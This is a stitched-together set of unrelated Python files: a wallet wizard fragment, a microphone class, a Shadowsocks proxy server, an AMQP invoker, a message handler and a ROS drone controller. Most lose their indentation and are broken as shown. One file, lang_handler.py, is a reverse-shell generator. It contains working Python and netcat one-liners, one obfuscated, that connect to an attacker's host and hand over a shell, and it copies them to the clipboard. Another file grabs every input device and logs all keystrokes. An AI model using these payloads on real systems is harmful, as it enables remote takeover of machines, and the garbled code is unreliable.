title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require %d signatures')%m)
cw.set_m(m)
def on_n(n):
n_label.setText(_('From %d cosigners')%n)
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
global_key_listener.py
|
#!/usr/bin/env python
from evdev import InputDevice, list_devices, categorize, ecodes
import threading
def listen_for_events(dev):
    for event in dev.read_loop():
        if event.type == ecodes.EV_KEY:
            print(dev.name + " - " + dev.fn + ": " + str(categorize(event)))
print("This script grabs all the devices and doesn't allow keystrokes to pass through normally, "
      "effectively blocking all the ways to stop this script from the keyboard (but not the mouse, thankfully).")
# TODO: add a device selection to exclude one device that could do the Ctrl+C
input("Press Enter to continue or Ctrl+C to exit")
devices = [InputDevice(fn) for fn in list_devices()]
for dev in devices:
print(dev.fn, dev.name, dev.phys)
thread = threading.Thread(target=listen_for_events, args=(dev,))
thread.daemon = False
thread.start()
|
microphone.py
|
###################################################################################################
#
# Project: Embedded Learning Library (ELL)
# File: microphone.py
# Authors: Chris Lovett
#
# Requires: Python 3.x
#
###################################################################################################
import audioop
import math
import sys
from threading import Thread, Lock, Condition
import numpy as np
import pyaudio
def list_devices():
audio = pyaudio.PyAudio()
print("Pick from available microphones:")
for i in range(audio.get_device_count()):
info = audio.get_device_info_by_index(i)
if info["maxInputChannels"] > 0:
print(" {}. {}".format(i, info["name"]))
class Microphone:
""" This class wraps the pyaudio library and it's input stream callback providing a simple to
use Microphone class that you can simply read from """
def __init__(self, auto_scale=True, console=True):
""" Create Microphone object.
console - specifies whether you are running from console app, if so this will listen for
stdin "x" so user can tell you app to close the microphone """
self.audio = pyaudio.PyAudio()
self.read_buffer = []
self.lock = Lock()
self.cv = Condition(self.lock)
self.closed = False
self.num_channels = 1
self.console = console
self.stdin_thread = None
self.input_stream = None
self.auto_scale = auto_scale
self.audio_scale_factor = 1
self.tail = None
def open(self, sample_size, sample_rate, num_channels, input_device=None):
""" Open the microphone so it returns chunks of audio samples of the given sample_size
where audio is converted to the expected sample_rate and num_channels
and then scaled to floating point numbers between -1 and 1.
        sample_size - number of samples to return from read method
        sample_rate - the expected sample rate (e.g. 16000)
        num_channels - the number of audio channels to return
        input_device - input device index if you don't want to use the default
        """
self.sample_rate = sample_rate
self.sample_size = sample_size
self.num_channels = num_channels
self.audio_format = pyaudio.paInt16
self.cvstate = None
if input_device:
info = self.audio.get_device_info_by_index(input_device)
else:
info = self.audio.get_default_input_device_info()
self.mic_rate = int(info['defaultSampleRate'])
buffer_size = int(math.ceil(sample_size * self.mic_rate / sample_rate))
self.input_stream = self.audio.open(format=pyaudio.paInt16,
channels=num_channels,
rate=self.mic_rate,
input=True,
frames_per_buffer=buffer_size,
stream_callback=self._on_recording_callback,
input_device_index=input_device)
if self.auto_scale:
self.audio_scale_factor = 1 / 32768 # since we are using pyaudio.paInt16.
self.closed = False
if self.console:
# since our read call blocks the UI we use a separate thread to monitor user input
self.stdin_thread = Thread(target=self.monitor_input, args=(sys.stdin,))
self.stdin_thread.daemon = True
self.stdin_thread.start()
def _on_recording_callback(self, data, frame_count, time_info, status):
if self.mic_rate != self.sample_rate:
# convert the incoming audio to the desired recording rate
result, self.cvstate = audioop.ratecv(data, 2, self.num_channels, self.mic_rate, self.sample_rate,
self.cvstate)
else:
result = data
# protect access to the shared state
self.cv.acquire()
try:
self.read_buffer += [result]
if len(self.read_buffer) == 1:
self.cv.notify()
except:
pass
self.cv.release()
return (data, pyaudio.paContinue)
def read(self):
""" Read the next audio chunk. This method blocks until the audio is available """
while not self.closed:
result = None
# deal with any accumulation of tails, if the tail grows to a full
# buffer then return it!
if self.tail is not None and len(self.tail) >= self.sample_size:
data = self.tail[0:self.sample_size]
self.tail = self.tail[self.sample_size:]
return data
# block until microphone data is ready...
self.cv.acquire()
try:
while len(self.read_buffer) == 0:
if self.closed:
return None
self.cv.wait(0.1)
result = self.read_buffer.pop(0)
except:
pass
self.cv.release()
if result is not None:
# convert int16 data to scaled floats
data = np.frombuffer(result, dtype=np.int16)
data = data.astype(float)
if self.tail is not None:
# we have a tail from previous frame, so prepend it
data = np.concatenate((self.tail, data))
# now the caller needs us to stick to our sample_size contract, but when
# rate conversion happens we can't be sure that 'data' is exactly that size.
if len(data) > self.sample_size:
# usually one byte extra so add this to our accumulating tail
self.tail = data[self.sample_size:]
data = data[0:self.sample_size]
if len(data) < self.sample_size:
# might have reached the end of the stream.
zeros = np.zeros(self.sample_size - len(data))
data = np.concatenate((data, zeros))
return data * self.audio_scale_factor
return None
def close(self):
""" Close the microphone """
self.closed = True
if self.input_stream:
self.input_stream.close()
def is_closed(self):
""" return true if the microphone is closed """
return self.closed
def monitor_input(self, stream):
""" monitor stdin since our read call is blocking, this way user can type 'x' to quit """
try:
while not self.closed:
out = stream.readline()
if out:
msg = out.rstrip('\n')
if msg == "exit" or msg == "quit" or msg == "x":
print("closing microphone...")
self.closed = True
else:
break
except:
errorType, value, traceback = sys.exc_info()
msg = "### Exception: %s: %s" % (str(errorType), str(value))
            print(msg)
|
lang_handler.py
|
from simple_term_menu import TerminalMenu
import pyperclip
languages = {
"python": ["python", "py", "py3"],
"netcat": ["nc", "netcat"],
"bash": ["sh", "bash"],
"php": ["php"],
"ruby": ["ruby"],
}
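# maps each supported language to the aliases a user may type; lang_handler resolves an alias to
# the matching payload-generator function below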
def lang_handler(lang, option):
for key, values in languages.items():
for value in values:
if lang in value:
if key == "python":
rs = python(option)
return rs
elif key == "netcat":
rs = netcat(option)
return rs
elif key == "bash":
rs = bash(option)
return rs
elif key == "php":
rs = php(option)
return rs
elif key == "ruby":
rs = ruby(option)
return rs
else:
raise NotImplementedError
def python(option=""):
python_rs = [
r'''export RHOST="{}";export RPORT={};python -c \'import socket,os,pty;s=
socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[
os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")\'''',
r"""C:\Python27\python.exe -c \"(lambda __y, __g, __contextlib: [[[[[[[
(s.connect(('{}', {})), [[[(s2p_thread.start(), [[(p2s_thr
ead.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__
(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except',
(), {{'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value
, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt)
and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])}})(),
type('try', (), {{'__enter__': lambda self: None, '__exit__': lambda __self, __
exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __
after: __after()))[1])]][0]}})())))([None]))[1] for p2s_thread.daemon in [(True)]]
[0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1]
for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread
(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32
\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]]
[0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for
__g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda
__this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __
after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({{}}), 'p2s')]][0]
for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y
(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after(
))[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in
[(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'],
__l['p'] in [(s, p)]][0])({{}}), 's2p')]][0] for __g['os'] in [(__import__('os', __
g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __
g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading']
in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y
: f(lambda: y(y)()))), globals(), __import__('contextlib'))\"""",
'''python -c \'import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);
s.connect(("{}",{},0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\'''',
]
if option is True:
rs = python_rs[0]
else:
options_python_rs = [
"Generic Python Reverse Shell",
"Windows Only Python Reverse Shell",
"IPV6 Reverse Shell",
]
terminal_menu_lang = TerminalMenu(
options_python_rs, title="Python Reverse Shell"
)
option = terminal_menu_lang.show()
rs = python_rs[option]
return rs
def netcat(option=""):
netcat_rs = [
"nc -e /bin/sh {} {}",
"rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f",
"rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f",
]
if option is True:
rs = netcat_rs[0]
else:
options_netcat_rs = [
"Basic Netcat Reverse Shell",
"Netcat OpenBsd Reverse Shell",
"Netcat BusyBox Reverse Shell",
]
terminal_menu_lang = TerminalMenu(
options_netcat_rs, title="Netcat Reverse Shell"
)
option = terminal_menu_lang.show()
rs = netcat_rs[option]
return rs
def bash(option=""):
pass
def php(option=""):
pass
def ruby(option=""):
pass
# This function will put the reverse shell into the clipboard of the system.
def provide_rs(rs, ip, port):
print("Reverse Shell is now in clipboard.")
pyperclip.copy(f"{rs.format(ip,port)}")
|
ssserver.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2014 clowwindy
# Copyright (c) 2014 v3aqb
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import with_statement
__version__ = '1.0.0'
import sys
if sys.version_info < (2, 6):
import simplejson as json
else:
import json
try:
import gevent
import gevent.monkey
gevent.monkey.patch_all(dns=gevent.version_info[0] >= 1)
except ImportError:
gevent = None
print >>sys.stderr, 'warning: gevent not found, using threading instead'
import select
import socket
import threading
import SocketServer
import struct
import logging
import getopt
import encrypt
import os
import urlparse
from util import create_connection, getaddrinfo, parse_hostport, get_ip_address
class ShadowsocksServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
allow_reuse_address = True
def __init__(self, serverinfo, RequestHandlerClass, bind_and_activate=True):
self.serverinfo = serverinfo
p = urlparse.urlparse(serverinfo)
encrypt.check(p.password, p.username)
self.key, self.method = p.password, p.username
self.aports = [int(k) for k in urlparse.parse_qs(p.query).get('ports', [''])[0].split(',') if k.isdigit()]
reverse = urlparse.parse_qs(p.query).get('reverse', [''])[0]
self.reverse = parse_hostport(reverse) if reverse else None
addrs = getaddrinfo(p.hostname, p.port)
if not addrs:
raise ValueError('cant resolve listen address')
self.address_family = addrs[0][0]
server_address = (p.hostname, p.port)
SocketServer.TCPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate=bind_and_activate)
def server_activate(self):
self.socket.listen(self.request_queue_size)
class Socks5Server(SocketServer.StreamRequestHandler):
timeout = 20
bufsize = 8192
def handle_tcp(self, local, remote, timeout=60):
try:
fdset = [local, remote]
while fdset:
r, w, e = select.select(fdset, [], [], timeout)
if not r:
logging.debug('read time out')
break
if local in r:
data = local.recv(self.bufsize)
if not data:
remote.shutdown(socket.SHUT_WR)
local.shutdown(socket.SHUT_RD)
fdset.remove(local)
else:
remote.sendall(self.decrypt(data))
if remote in r:
data = remote.recv(self.bufsize)
if not data:
local.shutdown(socket.SHUT_WR)
remote.shutdown(socket.SHUT_RD)
fdset.remove(remote)
else:
local.sendall(self.encrypt(data))
finally:
local.close()
remote.close()
def encrypt(self, data):
return self.encryptor.encrypt(data)
def decrypt(self, data):
return self.encryptor.decrypt(data)
def _request_is_loopback(self, req):
try:
return get_ip_address(req[0]).is_loopback
except Exception:
pass
def handle(self):
self.remote = None
try:
self.encryptor = encrypt.Encryptor(self.server.key, self.server.method, servermode=True)
sock = self.connection
# sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
iv_len = self.encryptor.iv_len()
if iv_len:
try:
self.decrypt(self.rfile.read(iv_len))
except ValueError:
                    logging.warn('server %s:%d iv reused, possible replay attack. closing...' % self.server.server_address)
return
data = sock.recv(1)
if not data:
return
addrtype = ord(self.decrypt(data))
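            # shadowsocks address header type: 1 = IPv4, 3 = hostname, 4 = IPv6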
if addrtype == 1:
addr = socket.inet_ntoa(self.decrypt(self.rfile.read(4)))
elif addrtype == 3:
addr = self.decrypt(self.rfile.read(ord(self.decrypt(self.rfile.read(1)))))
elif addrtype == 4:
addr = socket.inet_ntop(socket.AF_INET6, self.decrypt(self.rfile.read(16)))
else: # not supported
logging.warn('server %s:%d addr_type not supported, maybe wrong password' % self.server.server_address)
return
port = struct.unpack('>H', self.decrypt(self.rfile.read(2)))[0]
if self.server.aports and port not in self.server.aports:
logging.info('server %s:%d port %d not allowed' % (self.server.server_address[0], self.server.server_address[1], port))
return
if self._request_is_loopback((addr, port)):
logging.info('server %s:%d localhost access denied' % self.server.server_address)
return
try:
logging.info('server %s:%d request %s:%d from %s:%d' % (self.server.server_address[0], self.server.server_address[1],
addr, port, self.client_address[0], self.client_address[1]))
data = self.decrypt(sock.recv(self.bufsize))
if self.server.reverse:
if data.startswith((b'GET', b'POST', b'HEAD', b'PUT', b'DELETE', b'TRACE', b'OPTIONS', b'PATCH', b'CONNECT')) and b'HTTP/1' in data and b'\r\n' in data:
data = data.decode('latin1')
data = data.replace('\r\n', '\r\nss-realip: %s:%s\r\nss-client: %s\r\n' % (self.client_address[0], self.client_address[1], self.server.key), 1)
self.remote = create_connection(self.server.reverse, timeout=10)
else:
a = 'CONNECT %s:%d HTTP/1.0\r\nss-realip: %s:%s\r\nss-client: %s\r\n\r\n' % (addr, port, self.client_address[0], self.client_address[1], self.server.key)
self.remote = create_connection(self.server.reverse, timeout=10)
self.remote.sendall(a.encode('latin1'))
remoterfile = self.remote.makefile('rb', 0)
d = remoterfile.readline()
while d not in (b'\r\n', b'\n', b'\r'):
if not d:
raise IOError(0, 'remote closed')
d = remoterfile.readline()
if not self.remote:
self.remote = create_connection((addr, port), timeout=10)
self.remote.sendall(data)
# self.remote.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
except (IOError, OSError) as e: # Connection refused
logging.warn('server %s:%d %r on connecting %s:%d' % (self.server.server_address[0], self.server.server_address[1], e, addr, port))
return
self.handle_tcp(sock, self.remote)
except socket.error as e:
logging.warn('server %s:%d %r' % (self.server.server_address[0], self.server.server_address[1], e))
def finish(self):
SocketServer.StreamRequestHandler.finish(self)
if self.remote:
self.remote.close()
def start_servers(config):
for serverinfo in config:
try:
logging.info('starting server: %s' % serverinfo)
ssserver = ShadowsocksServer(serverinfo, Socks5Server)
threading.Thread(target=ssserver.serve_forever).start()
except Exception as e:
logging.error('something wrong with config: %r' % e)
def main():
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S', filemode='a+')
hello = 'shadowsocks-server %s' % __version__
if gevent:
hello += ' with gevent %s' % gevent.__version__
print(hello)
print('by v3aqb')
config_path = None
server = None
if os.path.exists(os.path.join(os.path.dirname(__file__), 'config.json')):
config_path = os.path.join(os.path.dirname(__file__), 'config.json')
try:
optlist, args = getopt.getopt(sys.argv[1:], 'c:f:')
for key, value in optlist:
if key == '-f':
config_path = value
if key == '-c':
server = value
if server:
config = [server]
elif config_path:
logging.info('loading config from %s' % config_path)
with open(config_path, 'rb') as f:
try:
config = json.load(f)
except ValueError as e:
logging.error('found an error in config.json: %s', e.message)
sys.exit(1)
else:
config = ['ss://aes-256-cfb:barfoo!@127.0.0.1:8388', ]
except getopt.GetoptError:
sys.exit(2)
start_servers(config)
if __name__ == '__main__':
try:
main()
except socket.error as e:
logging.error(e)
except KeyboardInterrupt:
sys.exit(0)
|
amqp_invoker.py
|
"""Summary."""
import datetime
import logging
import signal
import socket
import threading
from contextlib import contextmanager
from typing import Callable, Dict
from urllib.parse import urlparse
import kombu
import kombu.exceptions
import kombu.message
from kombu.pools import producers
from ergo.function_invocable import FunctionInvocable
from ergo.invoker import Invoker
from ergo.message import Message, decodes, encodes
from ergo.topic import PubTopic, SubTopic
from ergo.util import extract_from_stack, instance_id
logger = logging.getLogger(__name__)
PREFETCH_COUNT = 1
TERMINATION_GRACE_PERIOD = 60 # seconds
# rabbitmq's recommended default https://www.rabbitmq.com/heartbeats.html#heartbeats-timeout
DEFAULT_HEARTBEAT = 60 # seconds.
def set_param(host: str, param_key: str, param_val: str) -> str:
"""Overwrite a param in a host string w a new value."""
uri, new_param = urlparse(host), f'{param_key}={param_val}'
params = [p for p in uri.query.split('&') if param_key not in p] + [new_param]
return uri._replace(query='&'.join(params)).geturl()
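# e.g. set_param("amqp://localhost/?heartbeat=10", "heartbeat", "60") -> "amqp://localhost/?heartbeat=60"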
def make_error_output(err: Exception) -> Dict[str, str]:
"""Make a more digestible error output."""
orig = err.__context__ or err
err_output = {
'type': type(orig).__name__,
'message': str(orig),
}
filename, lineno, function_name = extract_from_stack(orig)
if None not in (filename, lineno, function_name):
err_output = {**err_output, 'file': filename, 'line': lineno, 'func': function_name}
return err_output
class AmqpInvoker(Invoker):
"""Summary."""
def __init__(self, invocable: FunctionInvocable) -> None:
super().__init__(invocable)
heartbeat = self._invocable.config.heartbeat or DEFAULT_HEARTBEAT
self._connection = kombu.Connection(self._invocable.config.host, heartbeat=heartbeat)
self._exchange = kombu.Exchange(name=self._invocable.config.exchange, type="topic", durable=True, auto_delete=False)
component_queue_name = f"{self._invocable.config.func}".replace("/", ":")
if component_queue_name.startswith(":"):
component_queue_name = component_queue_name[1:]
self._component_queue = kombu.Queue(name=component_queue_name, exchange=self._exchange, routing_key=str(SubTopic(self._invocable.config.subtopic)), durable=True)
instance_queue_name = f"{component_queue_name}:{instance_id()}"
self._instance_queue = kombu.Queue(name=instance_queue_name, exchange=self._exchange, routing_key=str(SubTopic(instance_id())), auto_delete=True)
error_queue_name = f"{component_queue_name}:error"
self._error_queue = kombu.Queue(name=error_queue_name, exchange=self._exchange, routing_key=error_queue_name, durable=False)
self._terminating = threading.Event()
self._pending_invocations = threading.Semaphore()
self._handler_lock = threading.Lock()
def start(self) -> int:
signal.signal(signal.SIGTERM, self._shutdown)
signal.signal(signal.SIGINT, self._shutdown)
with self._connection:
conn = self._connection
consumer: kombu.Consumer = conn.Consumer(queues=[self._component_queue, self._instance_queue], prefetch_count=PREFETCH_COUNT, accept=["json"])
consumer.register_callback(self._start_handle_message_thread)
consumer.consume()
while not self._terminating.is_set():
try:
# wait up to 1s for the next message before sending a heartbeat
conn.drain_events(timeout=1)
except socket.timeout:
conn.heartbeat_check()
except conn.recoverable_connection_errors:
if self._terminating.is_set():
continue
logger.warning("connection closed. reviving.")
conn = self._connection.clone()
conn.ensure_connection()
consumer.revive(conn.channel())
consumer.consume()
return 0
def _start_handle_message_thread(self, body: str, message: kombu.message.Message):
# _handle_sigterm will wait for _handle_message to release this semaphore
self._pending_invocations.acquire(blocking=False)
threading.Thread(target=self._handle_message, args=(body, message.ack)).start()
def _handle_message(self, body: str, ack: Callable):
# there may be up to PREFETCH_COUNT _handle_message threads alive at a time, but we want them to execute
# sequentially to guarantee that messages are acknowledged in the order they're received
with self._handler_lock:
try:
ergo_message = decodes(body)
self._handle_message_inner(ergo_message)
finally:
ack()
self._pending_invocations.release()
def _handle_message_inner(self, message_in: Message):
try:
for message_out in self.invoke_handler(message_in):
routing_key = str(PubTopic(message_out.key))
self._publish(message_out, routing_key)
except Exception as err: # pylint: disable=broad-except
dt = datetime.datetime.now(datetime.timezone.utc)
message_in.error = make_error_output(err)
message_in.traceback = str(err)
message_in.scope.metadata['timestamp'] = dt.isoformat()
self._publish(message_in, self._error_queue.name)
def _publish(self, ergo_message: Message, routing_key: str):
amqp_message = encodes(ergo_message).encode("utf-8")
with self._producer() as producer:
producer.publish(
amqp_message,
content_encoding="binary",
exchange=self._exchange,
routing_key=routing_key,
retry=True,
declare=[self._instance_queue, self._error_queue],
)
@contextmanager
def _producer(self) -> kombu.Producer:
with producers[self._connection].acquire(block=True) as conn:
yield conn
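    # graceful shutdown: mark the consumer loop as terminating, wait (up to the grace period) for the
    # in-flight invocation to finish, close the connection, then re-raise the signal with the default handler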
def _shutdown(self, signum, *_):
self._terminating.set()
self._pending_invocations.acquire(blocking=True, timeout=TERMINATION_GRACE_PERIOD)
self._connection.close()
signal.signal(signum, 0)
signal.raise_signal(signum)
|
messagehandler.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from HTTPWebSocketsHandler import HTTPWebSocketsHandler
'''
credits:
combined http(s) and websocket server copied from
https://github.com/PyOCL/httpwebsockethandler
The MIT License (MIT)
Copyright (c) 2015 Seven Watt
'''
import sys
import os
import queue
import copy
from threading import Thread, Lock
import defaults
class EventListener:
''' stores event listener specific data
'''
def __init__(self, name, priority, event_handler):
self.name = name
self.priority = priority
self.event_handler = event_handler
class QueryHandler:
''' stores query handler specific data
'''
def __init__(self, name, priority, query_handler):
self.name = name
self.priority = priority
self.query_handler = query_handler
class QueueEvent:
''' stores event specific data
'''
def __init__(self, user, ev_type, data):
self.user = user
self.type = ev_type
self.data = data
class Query:
''' stores query specific data
'''
def __init__(self, user, qu_type, params,unlimed_nr_of_results=False):
self.user = user
self.type = qu_type
self.unlimed_nr_of_results = unlimed_nr_of_results
self.params = params
class MessageHandler:
'''does the event-based message handling
'''
def __init__(self, modref):
self.event_listeners = []
self.query_handlers = []
self.modref = modref
self.queue = queue.Queue() # data queue
self.mutex = Lock() # prepare lock for atomic data changes
self.th = Thread(target=self.run)
# Start the thread
self.th.daemon = True
self.th.start()
def run(self):
''' endless thread loop to distribute all incoming events to all event listeners
'''
print("message handler thread loop")
while True:
queue_event = self.queue.get(
block=True) # waits for incoming queue_event objects
for event_handler in self.event_listeners:
# allows the handler to modify the event (just for later extensions :-)
queue_event = event_handler.event_handler(queue_event)
if not queue_event: # if an event handler returns None, stop further handling of this message
break
def add_event_handler(self, name, priority, event_handler):
self.mutex.acquire() # avoid thread interference
self.event_listeners.append(
EventListener(name, priority, event_handler))
# release the mutex lock
self.mutex.release()
def add_query_handler(self, name, priority, query_handler):
self.mutex.acquire() # avoid thread interference
self.query_handlers.append(
QueryHandler(name, priority, query_handler))
# release the mutex lock
self.mutex.release()
def queue_event(self, owner, ev_type, data):
self.queue.put(QueueEvent(owner, ev_type, data))
def queue_event_obj(self, queue_event):
self.queue.put(queue_event)
def query(self, query):
res = []
query_start_page = 0
try:
if 'query_start_page' in query.params and query.params['query_start_page'] >= 0:
query_start_page = query.params['query_start_page']
except Exception:
pass # no page number was provided
if query.unlimed_nr_of_results:
for query_handler in self.query_handlers:
all_received = False
query_start_size = 1
this_res = []
while not all_received:
this_res = query_handler.query_handler(query,
defaults.MAX_QUERY_SIZE*query_start_size+1)
# all results have been received once the handler returns no more than the requested block size
all_received = len(
this_res) <= defaults.MAX_QUERY_SIZE*query_start_size
query_start_size *= 2 # double the block size for another loop, if needed
res += this_res
return res
else:
for query_handler in self.query_handlers:
# ask each handler for one result more than MAX_QUERY_SIZE so callers can detect that more results exist
if defaults.MAX_QUERY_SIZE*(query_start_page+1)-len(res) < 0:
break
res += query_handler.query_handler(query,
defaults.MAX_QUERY_SIZE*(query_start_page+1)-len(res)+1) # max. + 1
# keep one extra result beyond MAX_QUERY_SIZE so the caller can detect that more pages exist
# (a standalone sketch of this paging convention follows this class)
return res[defaults.MAX_QUERY_SIZE*query_start_page:defaults.MAX_QUERY_SIZE*(query_start_page+1)+1]
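# ---------------------------------------------------------------------------
# Hedged sketch (illustration only, not part of the original module): the
# paging convention used by MessageHandler.query above is "ask the handler for
# one result more than the page size; if that extra result comes back, more
# pages exist". The self-contained toy below shows the idea; _paging_sketch,
# toy_handler, page_size and fetch_page are invented names for the example.
def _paging_sketch():
    page_size = 5
    data = list(range(12))  # pretend backend with 12 results

    def toy_handler(offset, max_size):
        # a query handler returns at most max_size results starting at offset
        return data[offset:offset + max_size]

    def fetch_page(page):
        # request one extra result so the caller can detect further pages
        chunk = toy_handler(page * page_size, page_size + 1)
        has_more = len(chunk) > page_size
        return chunk[:page_size], has_more

    print(fetch_page(0))  # ([0, 1, 2, 3, 4], True)
    print(fetch_page(2))  # ([10, 11], False)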
|
controller.py
|
#!/usr/bin/env python
import rospy
import geometry_msgs.msg
import mavros_msgs.srv
import mavros_msgs.msg
import ursa.srv
import tf2_ros
import tf2_geometry_msgs
import threading
import nav_msgs.msg
setpoint = geometry_msgs.msg.TransformStamped()
takeOff=False
tf_buffer = tf2_ros.Buffer(rospy.Duration(10.0)) #tf buffer length
def set_position_thread():
rate = rospy.Rate(20)
br = tf2_ros.TransformBroadcaster()
while True:
setpoint.header.stamp = rospy.Time.now()
br.sendTransform(setpoint)
rate.sleep()
def setpoint_land():
setpoint.transform.translation.z = -0.1
rospy.sleep(4)
if takeOff == False:
arm(False)
def handle_takeoff_land(data):
global setpoint
global takeOff
if data.takeoff and data.height <= 0.99:
setpoint.transform.translation.z=data.height
set_mode(0, "OFFBOARD")
arm(True)
takeOff = True
return ursa.srv.TakeoffLandResponse(1)
elif data.height>2.5:
return ursa.srv.TakeoffLandResponse(-1)
elif not data.takeoff:
t = threading.Thread(target=setpoint_land)
t.daemon = True
takeOff = False
t.start()
return ursa.srv.TakeoffLandResponse(1)
def waypointCB(data):
global setpoint
transform = tf_buffer.lookup_transform("map",
data.header.frame_id, #source frame
rospy.Time(0), #get the tf at first available time
rospy.Duration(1.0)) #wait for 1 second
# If goal is inside robot foot print then setpoint as goal opposed to local plan
# Commented out in response to issue #2. Set local planner orientation in trajectory generator when inside robot radius.
# if (((current_pose.pose.position.x - robot_radius) < global_plan_endpoint.pose.position.x) and
# (global_plan_endpoint.pose.position.x < (current_pose.pose.position.x + robot_radius)) and
# ((current_pose.pose.position.y - robot_radius) < global_plan_endpoint.pose.position.y) and
# (global_plan_endpoint.pose.position.y < (current_pose.pose.position.y + robot_radius))):
# mapPose = global_plan_endpoint
# else:
# mapPose = tf2_geometry_msgs.do_transform_pose(data.poses[-1], transform)
mapPose = tf2_geometry_msgs.do_transform_pose(data, transform)
setpoint.transform.translation.x = mapPose.pose.position.x
setpoint.transform.translation.y = mapPose.pose.position.y
setpoint.transform.rotation.x = mapPose.pose.orientation.x
setpoint.transform.rotation.y = mapPose.pose.orientation.y
setpoint.transform.rotation.z = mapPose.pose.orientation.z
setpoint.transform.rotation.w = mapPose.pose.orientation.w
if __name__ == '__main__':
rospy.init_node('ursa_controller', anonymous=True)
# a TransformListener must be attached to tf_buffer, otherwise lookup_transform in waypointCB cannot succeed
tf_listener = tf2_ros.TransformListener(tf_buffer)
rate = rospy.Rate(20)
# Init setpoint xform
setpoint.header.frame_id = "map"
setpoint.child_frame_id = "setpoint"
setpoint.transform.rotation.w = 1
# listen for nav stuff
local_plan_sub = rospy.Subscriber('/ursa_target', geometry_msgs.msg.PoseStamped, waypointCB, queue_size=10)
# setup services as client
set_mode = rospy.ServiceProxy('/mavros/set_mode', mavros_msgs.srv.SetMode)
arm = rospy.ServiceProxy('/mavros/cmd/arming', mavros_msgs.srv.CommandBool)
# setup services as server
rospy.Service('ursa_takeoff_land', ursa.srv.TakeoffLand, handle_takeoff_land)
# start tf publisher thread
t = threading.Thread(target=set_position_thread)
t.start()
